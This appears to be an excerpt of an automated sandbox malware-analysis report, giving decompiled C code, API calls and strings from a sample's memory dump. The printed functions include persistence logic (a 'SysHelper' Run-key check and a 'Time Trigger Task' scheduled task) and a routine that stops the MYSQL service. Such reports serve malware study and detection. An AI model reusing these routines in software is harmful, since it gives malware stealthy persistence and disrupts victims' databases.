SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00411C12
SHGetPathFromIDListW.SHELL32(?,?), ref: 00411C22
lstrcatW.KERNEL32 ref: 00411C3A
lstrcatW.KERNEL32 ref: 00411C44
GetSystemDirectoryW.KERNEL32 ref: 00411C68
lstrcatW.KERNEL32 ref: 00411C7A

Strings

\shell32.dll, xrefs: 00411C6E

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
String ID: \shell32.dll
API String ID: 679253221-3783449302
Opcode ID: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
Instruction ID: 1ac700bd2dba931ae0f93f3cd35093afe8c3aec66b03df765643047a9f16b657
Opcode Fuzzy Hash: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
Instruction Fuzzy Hash: 1D415E70A40209AFDB10CBA4DC88FEA7B7CEF44705F104499F609D7160D6B4AA45CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004549A0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 107
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 77%

			E004549A0(void* __ebx) {
				signed int _v8;
				long _v12;
				void* _v16;
				void* _v24;
				void* __edi;
				void* __esi;
				signed int _t21;
				CHAR* _t23;
				void* _t31;
				unsigned int _t34;
				struct HINSTANCE__* _t42;
				void* _t43;
				void* _t52;
				void* _t54;
				void* _t55;
				long _t56;
				signed int _t58;
				void* _t59;

				_t43 = __ebx;
				E0042F7C0(0xc);
				_t21 =  *0x50ad20; // 0xa4c21a8c
				_v8 = _t21 ^ _t58;
				_t23 =  *0x512a94; // 0xffffffff
				if(_t23 != 0) {
					L12:
					if(_t23 == 0xffffffff) {
						goto L6;
					} else {
						 *_t23();
						return E0042A77E(_t43, _v8 ^ _t58, _t52, _t54, _t56);
					}
				} else {
					_t42 = GetModuleHandleA(_t23);
					if(_t42 == 0) {
						_t23 =  *0x512a94; // 0xffffffff
					} else {
						_t23 = GetProcAddress(_t42, "_OPENSSL_isservice");
						 *0x512a94 = _t23;
					}
					if(_t23 != 0) {
						goto L12;
					} else {
						 *0x512a94 = 0xffffffff;
						L6:
						GetDesktopWindow();
						_t55 = GetProcessWindowStation();
						if(_t55 == 0 || GetUserObjectInformationW(_t55, 2, 0, 0,  &_v12) != 0 || GetLastError() != 0x7a) {
							L14:
							return E0042A77E(_t43, _v8 ^ _t58, _t52, _t55, _t56);
						} else {
							_t56 = _v12;
							if(_t56 > 0x200) {
								goto L14;
							} else {
								_t56 = _t56 + 0x00000001 & 0xfffffffe;
								E0043F980(_t56 + 2, _t56);
								_t31 = _t59;
								_v16 = _t31;
								if(GetUserObjectInformationW(_t55, 2, _t31, _t56,  &_v12) == 0) {
									goto L14;
								} else {
									_t47 = _v16;
									_t34 = _v12 + 0x00000001 & 0xfffffffe;
									_v12 = _t34;
									_push(L"Service-0x");
									 *((short*)(_v16 + (_t34 >> 1) * 2)) = 0;
									E00421C02(_v16);
									asm("sbb eax, eax");
									return E0042A77E(_t43, _v8 ^ _t58, 0, _t55, _t56, _t47);
								}
							}
						}
					}
				}
			}

APIs

GetModuleHandleA.KERNEL32(FFFFFFFF,?,00000001,?,00454B72), ref: 004549C7
GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice,?,00454B72), ref: 004549D7
GetDesktopWindow.USER32 ref: 004549FB
GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
_wcsstr.LIBCMT ref: 00454A8A

Strings

_OPENSSL_isservice, xrefs: 004549D1
Service-0x, xrefs: 00454A80

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
String ID: Service-0x$_OPENSSL_isservice
API String ID: 2112994598-1672312481
Opcode ID: 3807c14e2e06666c3841fd577d8dc4c169a4d8fe6725ffaf2f8e04ccca0ab35a
Instruction ID: a4b3c478c226dd270820e71b951499fe23bca8177d071b610c32d3665965eb2a
Opcode Fuzzy Hash: 3807c14e2e06666c3841fd577d8dc4c169a4d8fe6725ffaf2f8e04ccca0ab35a
Instruction Fuzzy Hash: 04312831A401049BCB10DBBAEC46AAE7778DFC4325F10426BFC19D72E1EB349D148B58

Uniqueness

Uniqueness Score: -1.00%

Function 00454AE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 75
registrywindowCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E00454AE0(void* __ebx, void* __edx, void* __edi, void* __esi, char _a4, char _a259, signed int _a260, wchar_t* _a268, void _a272) {
				CHAR* _v0;
				signed int _t17;
				void* _t19;
				void* _t46;
				void* _t49;
				void* _t50;
				signed int _t51;
				signed int _t52;

				_t48 = __esi;
				_t47 = __edi;
				_t46 = __edx;
				_t39 = __ebx;
				E0042F7C0(0x108);
				_t17 =  *0x50ad20; // 0xa4c21a8c
				_a260 = _t17 ^ _t51;
				_t19 = GetStdHandle(0xfffffff4);
				if(_t19 == 0 || GetFileType(_t19) == 0) {
					vswprintf( &_a4, 0xff, _a268,  &_a272);
					_t52 = _t51 + 0x10;
					_a259 = 0;
					if(E004549A0(_t39) <= 0) {
						MessageBoxA(0,  &_a4, "OpenSSL: FATAL", 0x10);
						return E0042A77E(_t39, _a260 ^ _t52, _t46, _t47, _t48);
					} else {
						_t49 = RegisterEventSourceA(0, "OPENSSL");
						_v0 =  &_a4;
						ReportEventA(_t49, 1, 0, 0, 0, 1, 0,  &_v0, 0);
						DeregisterEventSource(_t49);
						_t50 = _t48;
						return E0042A77E(_t39, _a260 ^ _t52, _t46, _t47, _t50);
					}
				} else {
					E0042BDCC(E00420E4D() + 0x40, _a268,  &_a272);
					return E0042A77E(__ebx, _a260 ^ _t51 + 0x0000000c, _t46, __edi, __esi);
				}
			}

APIs

GetStdHandle.KERNEL32(000000F4,00454C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0045480E,.\crypto\cryptlib.c,00000253,pointer != NULL,00000000,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454AFA
GetFileType.KERNEL32(00000000), ref: 00454B05
__vfwprintf_p.LIBCMT ref: 00454B27

Part of subcall function 0042BDCC: _vfprintf_helper.LIBCMT ref: 0042BDDF

vswprintf.LIBCMT ref: 00454B5D
RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00454B7E
ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00454BA2
DeregisterEventSource.ADVAPI32 ref: 00454BA9
MessageBoxA.USER32 ref: 00454BD3

Strings

OpenSSL: FATAL, xrefs: 00454BC7
OPENSSL, xrefs: 00454B77

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
String ID: OPENSSL$OpenSSL: FATAL
API String ID: 277090408-1348657634
Opcode ID: ce6eb8d3f5f16185de033b2eb02e1ed4c4d2bc7c389f561c58e1c798f68c238c
Instruction ID: 2d266f03b07cc91b1361f4b715b0612335af4cc100d4b249efeb6d9ab3704f8b
Opcode Fuzzy Hash: ce6eb8d3f5f16185de033b2eb02e1ed4c4d2bc7c389f561c58e1c798f68c238c
Instruction Fuzzy Hash: 74210D716443006BD770A761DC47FEF77D8EF94704F80482EF699861D1EAB89444875B

Uniqueness

Uniqueness Score: -1.00%

Function 00412360 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 61
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00412360() {
				void* _v8;
				int _v12;
				int _v16;
				int _v20;
				char _v2066;
				short _v2068;
				short _v4116;
				signed int _t35;

				E0042F7C0(0x1010);
				_v8 = 0;
				if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0xf003f,  &_v8) == 0) {
					_v12 = 1;
					_v2068 = 0;
					E0042B420( &_v2066, 0, 0x7fe);
					_v20 = 0x400;
					RegQueryValueExW(_v8, L"SysHelper", 0,  &_v12,  &_v2068,  &_v20);
					RegCloseKey(_v8);
					_v16 = 0;
					lstrcpyW( &_v4116,  *(CommandLineToArgvW(GetCommandLineW(),  &_v16)));
					_t35 = lstrcmpW( &_v4116,  &_v2068);
					asm("sbb eax, eax");
					return  ~_t35 + 1;
				} else {
					return 0;
				}
			}

0x00412368
0x00412370
0x00412391
0x0041239b
0x004123a8
0x004123b6
0x004123be
0x004123de
0x004123e7
0x004123ed
0x0041240e
0x00412422
0x0041242a
0x00412430
0x00412393
0x00412398
0x00412398

APIs

RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00412389
_memset.LIBCMT ref: 004123B6
RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004123DE
RegCloseKey.ADVAPI32(?), ref: 004123E7
GetCommandLineW.KERNEL32 ref: 004123F4
CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004123FF
lstrcpyW.KERNEL32 ref: 0041240E
lstrcmpW.KERNEL32(?,?), ref: 00412422

Strings

Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0041237F
SysHelper, xrefs: 004123D6

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
API String ID: 122392481-4165002228
Opcode ID: 06da7c2837e38599fef00ce52c1f6902c681b54622b65709e13af315f42eef8d
Instruction ID: c603cf62551caa9c06587f3e6ced3ee16b2371f56cdaae2afb18e0be874d4686
Opcode Fuzzy Hash: 06da7c2837e38599fef00ce52c1f6902c681b54622b65709e13af315f42eef8d
Instruction Fuzzy Hash: D7112C7194020DABDF50DFA0DC89FEE77BCBB04705F0445A5F509E2151DBB45A889F94

Uniqueness

Uniqueness Score: -1.00%

Function 00418000 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 344
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00418000(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				intOrPtr _t99;
				signed int _t102;
				signed int _t107;
				intOrPtr* _t108;
				intOrPtr _t110;
				intOrPtr _t111;
				intOrPtr _t112;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr* _t116;
				intOrPtr _t124;
				intOrPtr* _t136;
				intOrPtr _t148;
				intOrPtr _t149;
				intOrPtr _t160;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t183;
				intOrPtr _t185;
				intOrPtr* _t188;
				intOrPtr _t189;
				intOrPtr* _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				intOrPtr _t197;
				intOrPtr* _t198;
				intOrPtr* _t199;
				intOrPtr* _t200;
				intOrPtr* _t201;
				intOrPtr* _t204;
				intOrPtr _t207;
				intOrPtr* _t208;
				intOrPtr* _t210;
				intOrPtr* _t213;
				intOrPtr* _t219;
				void* _t226;

				_push(__ecx);
				_t219 = __ecx;
				_t213 = _a4;
				_t188 =  *((intOrPtr*)(__ecx + 0x10));
				if(_t188 < _t213) {
					L102:
					_push("invalid string position");
					E0044F26C(__eflags);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					return  *_t188;
				} else {
					_t183 = _a16;
					_t99 =  *((intOrPtr*)(_a12 + 0x10));
					if(_t99 < _t183) {
						goto L102;
					} else {
						_t188 = _t188 - _t213;
						_t207 =  <  ? _t188 : _a8;
						_a8 = _t207;
						_t185 =  <  ? _t99 - _t183 : _a20;
						_t102 =  *((intOrPtr*)(__ecx + 0x10)) - _t207;
						_v8 = _t102;
						if((_t102 | 0xffffffff) - _t185 <= _v8) {
							_push("string too long");
							E0044F23E(__eflags);
							goto L102;
						} else {
							_t189 = _t188 - _t207;
							_t107 = _v8 + _t185;
							_a20 = _t189;
							_v8 = _t107;
							if( *((intOrPtr*)(__ecx + 0x10)) < _t107) {
								_push(0);
								E00415810(_t185, __ecx, _t213, _t107);
								_t189 = _a20;
								_t207 = _a8;
							}
							_t108 = _a12;
							if(_t219 == _t108) {
								__eflags = _t185 - _t207;
								if(_t185 > _t207) {
									__eflags = _a16 - _t213;
									if(_a16 > _t213) {
										__eflags = _t213 + _t207 - _a16;
										_t110 =  *((intOrPtr*)(_t219 + 0x14));
										if(_t213 + _t207 > _a16) {
											__eflags = _t110 - 0x10;
											if(_t110 < 0x10) {
												_a12 = _t219;
											} else {
												_a12 =  *_t219;
											}
											__eflags = _t110 - 0x10;
											if(_t110 < 0x10) {
												_t190 = _t219;
											} else {
												_t190 =  *_t219;
											}
											__eflags = _t207;
											if(_t207 != 0) {
												__eflags = _a12 + _a16;
												E004205A0(_t190 + _t213, _a12 + _a16, _t207);
												_t207 = _a8;
												_t226 = _t226 + 0xc;
											}
											_t111 =  *((intOrPtr*)(_t219 + 0x14));
											__eflags = _t111 - 0x10;
											if(_t111 < 0x10) {
												_a12 = _t219;
											} else {
												_a12 =  *_t219;
											}
											__eflags = _t111 - 0x10;
											if(_t111 < 0x10) {
												_t191 = _t219;
											} else {
												_t191 =  *_t219;
											}
											_t112 = _a20;
											__eflags = _t112;
											if(_t112 != 0) {
												__eflags = _t191 + _t213 + _t185;
												E004205A0(_t191 + _t213 + _t185, _a12 + _t213 + _t207, _t112);
												_t226 = _t226 + 0xc;
											}
											_t113 =  *((intOrPtr*)(_t219 + 0x14));
											__eflags = _t113 - 0x10;
											if(_t113 < 0x10) {
												_a12 = _t219;
											} else {
												_a12 =  *_t219;
											}
											__eflags = _t113 - 0x10;
											if(_t113 < 0x10) {
												_t208 = _t219;
											} else {
												_t208 =  *_t219;
											}
											_t192 = _a8;
											_t115 = _t185 - _t192;
											__eflags = _t115;
											if(_t115 != 0) {
												_push(_t115);
												_push(_a12 + _a16 + _t185);
												_t124 = _t213 + _t208 + _t192;
												__eflags = _t124;
												goto L96;
											}
										} else {
											__eflags = _t110 - 0x10;
											if(_t110 < 0x10) {
												_a4 = _t219;
											} else {
												_a4 =  *_t219;
												_t207 = _a8;
											}
											__eflags = _t110 - 0x10;
											if(_t110 < 0x10) {
												_a12 = _t219;
											} else {
												_a12 =  *_t219;
											}
											__eflags = _t189;
											if(_t189 != 0) {
												__eflags = _a12 + _t213 + _t185;
												E004205A0(_a12 + _t213 + _t185, _a4 + _t213 + _t207, _t189);
												_t207 = _a8;
												_t226 = _t226 + 0xc;
											}
											_t197 =  *((intOrPtr*)(_t219 + 0x14));
											__eflags = _t197 - 0x10;
											if(_t197 < 0x10) {
												_t136 = _t219;
											} else {
												_t136 =  *_t219;
											}
											__eflags = _t197 - 0x10;
											if(_t197 < 0x10) {
												_t198 = _t219;
											} else {
												_t198 =  *_t219;
											}
											__eflags = _t185;
											if(_t185 != 0) {
												_push(_t185);
												_push(_t136 - _t207 + _a16 + _t185);
												_t124 = _t198 + _t213;
												goto L96;
											}
										}
									} else {
										_t148 =  *((intOrPtr*)(_t219 + 0x14));
										__eflags = _t148 - 0x10;
										if(_t148 < 0x10) {
											_a4 = _t219;
										} else {
											_a4 =  *_t219;
											_t207 = _a8;
										}
										__eflags = _t148 - 0x10;
										if(_t148 < 0x10) {
											_a8 = _t219;
										} else {
											_a8 =  *_t219;
										}
										__eflags = _t189;
										if(_t189 != 0) {
											__eflags = _a8 + _t213 + _t185;
											E004205A0(_a8 + _t213 + _t185, _a4 + _t213 + _t207, _t189);
											_t226 = _t226 + 0xc;
										}
										_t149 =  *((intOrPtr*)(_t219 + 0x14));
										__eflags = _t149 - 0x10;
										if(_t149 < 0x10) {
											_t210 = _t219;
										} else {
											_t210 =  *_t219;
										}
										__eflags = _t149 - 0x10;
										if(_t149 < 0x10) {
											_t199 = _t219;
										} else {
											_t199 =  *_t219;
										}
										__eflags = _t185;
										if(_t185 != 0) {
											_push(_t185);
											_push(_a16 + _t210);
											_t124 = _t199 + _t213;
											goto L96;
										}
									}
								} else {
									_t160 =  *((intOrPtr*)(_t219 + 0x14));
									__eflags = _t160 - 0x10;
									if(_t160 < 0x10) {
										_a4 = _t219;
									} else {
										_a4 =  *_t219;
									}
									__eflags = _t160 - 0x10;
									if(_t160 < 0x10) {
										_t200 = _t219;
									} else {
										_t200 =  *_t219;
									}
									__eflags = _t185;
									if(_t185 != 0) {
										__eflags = _a4 + _a16;
										E004205A0(_t200 + _t213, _a4 + _a16, _t185);
										_t207 = _a8;
										_t226 = _t226 + 0xc;
									}
									_t161 =  *((intOrPtr*)(_t219 + 0x14));
									__eflags = _t161 - 0x10;
									if(_t161 < 0x10) {
										_a8 = _t219;
									} else {
										_a8 =  *_t219;
									}
									__eflags = _t161 - 0x10;
									if(_t161 < 0x10) {
										_t201 = _t219;
									} else {
										_t201 =  *_t219;
									}
									_t162 = _a20;
									__eflags = _t162;
									if(_t162 != 0) {
										_push(_t162);
										_push(_a8 + _t213 + _t207);
										_t124 = _t201 + _t213 + _t185;
										L96:
										_push(_t124);
										E004205A0();
										goto L97;
									}
								}
							} else {
								if( *((intOrPtr*)(_t219 + 0x14)) < 0x10) {
									_a8 = _t219;
								} else {
									_a8 =  *_t219;
									_t213 = _a4;
								}
								if( *((intOrPtr*)(_t219 + 0x14)) < 0x10) {
									_a20 = _t219;
								} else {
									_a20 =  *_t219;
									_t213 = _a4;
								}
								if(_t189 != 0) {
									E004205A0(_a20 + _t213 + _t185, _a8 + _t213 + _t207, _t189);
									_t108 = _a12;
									_t226 = _t226 + 0xc;
								}
								if( *((intOrPtr*)(_t108 + 0x14)) >= 0x10) {
									_t108 =  *_t108;
								}
								if( *((intOrPtr*)(_t219 + 0x14)) < 0x10) {
									_t204 = _t219;
								} else {
									_t204 =  *_t219;
								}
								if(_t185 != 0) {
									E0042D8D0(_t204 + _t213, _t108 + _a16, _t185);
									L97:
								}
							}
							_t193 = _v8;
							 *(_t219 + 0x10) = _t193;
							if( *((intOrPtr*)(_t219 + 0x14)) < 0x10) {
								_t116 = _t219;
								 *((char*)(_t116 + _t193)) = 0;
								return _t116;
							} else {
								 *((char*)( *_t219 + _t193)) = 0;
								return _t219;
							}
						}
					}
				}
			}

APIs

_memmove.LIBCMT ref: 004180B9
_memmove.LIBCMT ref: 00418124
_memmove.LIBCMT ref: 004181A8
_memmove.LIBCMT ref: 00418221
_memmove.LIBCMT ref: 00418288
_memmove.LIBCMT ref: 004182C6
_memmove.LIBCMT ref: 00418305

Strings

string too long, xrefs: 00418338
invalid string position, xrefs: 00418342

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 792d112af0fa9ddc9baf780d6e55906f8cf88b841c6546fcd7dace90299be161
Instruction ID: bf4c3c4c16418921af35957e8a842e40232b78bc4dd53ff6fdc572851f10e90f
Opcode Fuzzy Hash: 792d112af0fa9ddc9baf780d6e55906f8cf88b841c6546fcd7dace90299be161
Instruction Fuzzy Hash: 4AC19F71700209EFDB18CF48C9819EE77A6EF85704B24492EE891CB741DB34ED968B99

Uniqueness

Uniqueness Score: -1.00%

Function 0040DAC0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 160
comstringCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E0040DAC0(char _a4, intOrPtr _a24) {
				intOrPtr _v8;
				intOrPtr _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				char _v40;
				char _v44;
				intOrPtr _v60;
				intOrPtr _v76;
				short _v84;
				intOrPtr _v88;
				char _v92;
				short _v20572;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t87;
				intOrPtr* _t93;
				intOrPtr* _t95;
				intOrPtr* _t97;
				intOrPtr* _t98;
				intOrPtr* _t100;
				intOrPtr _t129;

				 *[fs:0x0] = _t129;
				_t61 = E0042F7C0(0x504c);
				_v8 = 0;
				__imp__CoInitialize(0,  *[fs:0x0], 0x4ca948, 0xffffffff);
				if(_t61 >= 0) {
					__imp__CoCreateInstance(0x4d4f6c, 0, 1, 0x4d4f3c,  &_v24);
					_t63 = _v24;
					_push( &_v20);
					_push(0x4d4f8c);
					_push(0x4d4f9c);
					_push(L"Time Trigger Task");
					_push(_t63);
					if( *((intOrPtr*)( *_t63 + 0x20))() != 0) {
						_t98 = _v24;
						 *((intOrPtr*)( *_t98 + 0x1c))(_t98, L"Time Trigger Task");
						_t100 = _v24;
						 *((intOrPtr*)( *_t100 + 0x20))(_t100, L"Time Trigger Task", 0x4d4f9c, 0x4d4f8c,  &_v20);
					}
					_t65 = _v20;
					 *((intOrPtr*)( *_t65))(_t65, 0x4cf2e8,  &_v36);
					_t67 = _v36;
					 *((intOrPtr*)( *_t67 + 0x18))(_t67, 0, 1);
					_t69 = _v20;
					 *((intOrPtr*)( *_t69))(_t69, 0x4d4f7c,  &_v44);
					_t71 = _v20;
					 *((intOrPtr*)( *_t71 + 0x78))(_t71, 0x500078, 0);
					_t73 = _v20;
					_t122 =  >=  ? _a4 :  &_a4;
					 *((intOrPtr*)( *_t73 + 0x80))(_t73,  >=  ? _a4 :  &_a4);
					_t75 = _v20;
					 *((intOrPtr*)( *_t75 + 0x88))(_t75, L"--Task");
					_t78 =  >=  ? _a4 :  &_a4;
					lstrcpyW( &_v20572,  >=  ? _a4 :  &_a4);
					PathRemoveFileSpecW( &_v20572);
					_t83 = _v20;
					 *((intOrPtr*)( *_t83 + 0x90))(_t83,  &_v20572);
					_t85 = _v20;
					 *((intOrPtr*)( *_t85 + 0x48))(_t85, L"Comment");
					_t87 = _v20;
					_v28 = 0;
					_v32 = 0;
					_v40 = 0;
					 *((intOrPtr*)( *_t87 + 0xc))(_t87,  &_v40,  &_v28);
					E0042B420( &_v92, 0, 0x30);
					_v88 = 0xb07e2;
					_v92 = 0x30;
					_t129 = _t129 + 0xc;
					_v84 = 1;
					_t93 = _v28;
					_v76 = 0x21000c;
					_v60 = 0;
					 *((intOrPtr*)( *_t93 + 0xc))(_t93,  &_v92);
					_t95 = _v20;
					 *((intOrPtr*)( *_t95))(_t95, 0x4cf2e8,  &_v32);
					_t97 = _v32;
					_t61 =  *((intOrPtr*)( *_t97 + 0x18))(_t97, 0, 0);
					__imp__CoUninitialize();
				}
				if(_a24 >= 8) {
					_t61 = L00422587(_a4);
				}
				 *[fs:0x0] = _v16;
				return _t61;
			}

APIs

CoInitialize.OLE32(00000000), ref: 0040DAEB
CoCreateInstance.OLE32(004D4F6C,00000000,00000001,004D4F3C,?,?,004CA948,000000FF), ref: 0040DB0B
lstrcpyW.KERNEL32 ref: 0040DBD6
PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,004CA948,000000FF), ref: 0040DBE3
_memset.LIBCMT ref: 0040DC38
CoUninitialize.OLE32 ref: 0040DC92

Strings

--Task, xrefs: 0040DBB5
Time Trigger Task, xrefs: 0040DB24, 0040DB34, 0040DB52
Comment, xrefs: 0040DBFF

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
String ID: --Task$Comment$Time Trigger Task
API String ID: 330603062-1376107329
Opcode ID: 2e74f348d978aa6d86d7a4bcf4ad75af8e5eec8b3156eaf57847e3efada330f4
Instruction ID: 3ca8ca325a9fd4b6db29fab4a8cd6851ae340f1496bb62272076f21ffc706129
Opcode Fuzzy Hash: 2e74f348d978aa6d86d7a4bcf4ad75af8e5eec8b3156eaf57847e3efada330f4
Instruction Fuzzy Hash: E051F670A40209AFDB00DF94CC99FAE7BB9FF88705F208469F505AB2A0DB75A945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00411A10 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 63
servicesleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411A10() {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				void* _t9;
				int _t10;
				intOrPtr _t16;
				void* _t19;
				intOrPtr _t23;
				void* _t26;

				_t9 = OpenSCManagerW(0, 0, 1);
				_t19 = _t9;
				if(_t19 != 0) {
					_t10 = OpenServiceW(_t19, L"MYSQL", 0x20);
					_t26 = _t10;
					if(_t26 == 0) {
						L12:
						return _t10;
					}
					if(ControlService(_t26, 1,  &_v32) == 0) {
						L11:
						_t10 = CloseServiceHandle(_t19);
						goto L12;
					}
					if(QueryServiceStatus(_t26,  &_v32) == 0 || _v28 == 1) {
						L10:
						CloseServiceHandle(_t26);
						goto L11;
					} else {
						_t16 = _v12;
						do {
							_t23 = _t16;
							Sleep(_v8);
							if(QueryServiceStatus(_t26,  &_v32) == 0) {
								break;
							}
							_t16 = _v12;
						} while (_t16 >= _t23 && _v28 != 1);
						goto L10;
					}
				}
				return _t9;
			}

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00411A1D
OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00411A32
ControlService.ADVAPI32(00000000,00000001,?), ref: 00411A46
QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A5B
Sleep.KERNEL32(?), ref: 00411A75
QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A80
CloseServiceHandle.ADVAPI32(00000000), ref: 00411A9E
CloseServiceHandle.ADVAPI32(00000000), ref: 00411AA1

Strings

MYSQL, xrefs: 00411A2C

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
